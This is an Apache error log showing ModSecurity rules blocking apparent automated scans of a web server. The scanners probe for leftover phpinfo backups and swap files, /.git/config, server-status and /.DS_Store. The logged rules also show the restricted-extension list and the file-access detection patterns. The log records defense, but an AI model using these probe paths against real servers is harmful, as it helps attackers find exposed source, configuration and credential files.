[Sun Nov 16 06:06:30.779936 2025] [:error] [pid 105706] [client 13.62.46.112:40108] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.old"] [unique_id "aRlb1vgkUVuXhjEnxphnUwAAAAQ"]
[Sun Nov 16 06:06:30.780110 2025] [:error] [pid 105706] [client 13.62.46.112:40108] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.old"] [unique_id "aRlb1vgkUVuXhjEnxphnUwAAAAQ"]
[Sun Nov 16 06:06:30.781209 2025] [:error] [pid 105733] [client 13.62.46.112:40142] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/test.php.bak"] [unique_id "aRlb1gm3iQ6of_5tM-vZHgAAAAY"]
[Sun Nov 16 06:06:30.781499 2025] [:error] [pid 105733] [client 13.62.46.112:40142] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test.php.bak"] [unique_id "aRlb1gm3iQ6of_5tM-vZHgAAAAY"]
[Sun Nov 16 06:06:30.781674 2025] [:error] [pid 105733] [client 13.62.46.112:40142] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test.php.bak"] [unique_id "aRlb1gm3iQ6of_5tM-vZHgAAAAY"]
[Sun Nov 16 06:06:30.790925 2025] [:error] [pid 105761] [client 13.62.46.112:40146] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/test.php.backup"] [unique_id "aRlb1hajcO0QlxhJbyzqYgAAAAo"]
[Sun Nov 16 06:06:30.791204 2025] [:error] [pid 105761] [client 13.62.46.112:40146] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test.php.backup"] [unique_id "aRlb1hajcO0QlxhJbyzqYgAAAAo"]
[Sun Nov 16 06:06:30.791384 2025] [:error] [pid 105761] [client 13.62.46.112:40146] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test.php.backup"] [unique_id "aRlb1hajcO0QlxhJbyzqYgAAAAo"]
[Sun Nov 16 06:06:30.868735 2025] [:error] [pid 105706] [client 13.62.46.112:40162] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.backup"] [unique_id "aRlb1vgkUVuXhjEnxphnVAAAAAQ"]
[Sun Nov 16 06:06:30.869139 2025] [:error] [pid 105706] [client 13.62.46.112:40162] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.backup"] [unique_id "aRlb1vgkUVuXhjEnxphnVAAAAAQ"]
[Sun Nov 16 06:06:30.869314 2025] [:error] [pid 105706] [client 13.62.46.112:40162] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.backup"] [unique_id "aRlb1vgkUVuXhjEnxphnVAAAAAQ"]
[Sun Nov 16 06:06:30.881511 2025] [:error] [pid 105754] [client 13.62.46.112:40148] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/info.php.backup"] [unique_id "aRlb1n3mxOhUaPa_1PS3PgAAAAw"]
[Sun Nov 16 06:06:30.881848 2025] [:error] [pid 105754] [client 13.62.46.112:40148] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/info.php.backup"] [unique_id "aRlb1n3mxOhUaPa_1PS3PgAAAAw"]
[Sun Nov 16 06:06:30.882013 2025] [:error] [pid 105754] [client 13.62.46.112:40148] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/info.php.backup"] [unique_id "aRlb1n3mxOhUaPa_1PS3PgAAAAw"]
[Sun Nov 16 06:06:30.893366 2025] [:error] [pid 105733] [client 13.62.46.112:40178] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.backup"] [unique_id "aRlb1gm3iQ6of_5tM-vZHwAAAAY"]
[Sun Nov 16 06:06:30.893656 2025] [:error] [pid 105733] [client 13.62.46.112:40178] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.backup"] [unique_id "aRlb1gm3iQ6of_5tM-vZHwAAAAY"]
[Sun Nov 16 06:06:30.893811 2025] [:error] [pid 105733] [client 13.62.46.112:40178] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.backup"] [unique_id "aRlb1gm3iQ6of_5tM-vZHwAAAAY"]
[Sun Nov 16 06:07:12.592354 2025] [:error] [pid 105706] [client 13.62.46.112:52202] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.swp"] [unique_id "aRlcAPgkUVuXhjEnxphnVQAAAAQ"]
[Sun Nov 16 06:07:12.592746 2025] [:error] [pid 105706] [client 13.62.46.112:52202] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.swp"] [unique_id "aRlcAPgkUVuXhjEnxphnVQAAAAQ"]
[Sun Nov 16 06:07:12.592921 2025] [:error] [pid 105706] [client 13.62.46.112:52202] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.swp"] [unique_id "aRlcAPgkUVuXhjEnxphnVQAAAAQ"]
[Sun Nov 16 06:07:19.573345 2025] [:error] [pid 105754] [client 13.62.46.112:51780] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/info.php.swp"] [unique_id "aRlcB33mxOhUaPa_1PS3PwAAAAw"]
[Sun Nov 16 06:07:19.573669 2025] [:error] [pid 105754] [client 13.62.46.112:51780] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/info.php.swp"] [unique_id "aRlcB33mxOhUaPa_1PS3PwAAAAw"]
[Sun Nov 16 06:07:19.573826 2025] [:error] [pid 105754] [client 13.62.46.112:51780] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/info.php.swp"] [unique_id "aRlcB33mxOhUaPa_1PS3PwAAAAw"]
[Sun Nov 16 06:07:19.632193 2025] [:error] [pid 105760] [client 13.62.46.112:51792] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/test.php.swp"] [unique_id "aRlcByX-V6YaRQK52Hc2CgAAAAU"]
[Sun Nov 16 06:07:19.632513 2025] [:error] [pid 105760] [client 13.62.46.112:51792] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test.php.swp"] [unique_id "aRlcByX-V6YaRQK52Hc2CgAAAAU"]
[Sun Nov 16 06:07:19.632668 2025] [:error] [pid 105760] [client 13.62.46.112:51792] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test.php.swp"] [unique_id "aRlcByX-V6YaRQK52Hc2CgAAAAU"]
[Sun Nov 16 06:07:19.806736 2025] [:error] [pid 105761] [client 13.62.46.112:51826] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.swp"] [unique_id "aRlcBxajcO0QlxhJbyzqZAAAAAo"]
[Sun Nov 16 06:07:19.806995 2025] [:error] [pid 105761] [client 13.62.46.112:51826] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.swp"] [unique_id "aRlcBxajcO0QlxhJbyzqZAAAAAo"]
[Sun Nov 16 06:07:19.807159 2025] [:error] [pid 105761] [client 13.62.46.112:51826] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.swp"] [unique_id "aRlcBxajcO0QlxhJbyzqZAAAAAo"]
[Sun Nov 16 06:07:39.168682 2025] [authz_core:error] [pid 106193] [client 13.62.46.112:51192] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php
[Sun Nov 16 06:07:39.188891 2025] [authz_core:error] [pid 105706] [client 13.62.46.112:51168] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/info.php
[Sun Nov 16 06:07:39.334050 2025] [authz_core:error] [pid 105754] [client 13.62.46.112:51246] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/info.php.save
[Sun Nov 16 06:07:39.359366 2025] [authz_core:error] [pid 106191] [client 13.62.46.112:51204] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php.save
[Sun Nov 16 06:07:53.431714 2025] [:error] [pid 105715] [client 13.62.46.112:51862] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlcKTHqqjYXoy22w5LwAQAAAAE"]
[Sun Nov 16 06:07:53.431949 2025] [:error] [pid 105715] [client 13.62.46.112:51862] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlcKTHqqjYXoy22w5LwAQAAAAE"]
[Sun Nov 16 06:07:53.432126 2025] [:error] [pid 105715] [client 13.62.46.112:51862] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRlcKTHqqjYXoy22w5LwAQAAAAE"]
[Sun Nov 16 06:11:36.688580 2025] [authz_core:error] [pid 106193] [client 159.65.18.197:43904] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 16 06:11:37.298019 2025] [:error] [pid 105715] [client 159.65.18.197:43932] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRldCTHqqjYXoy22w5LwBgAAAAE"]
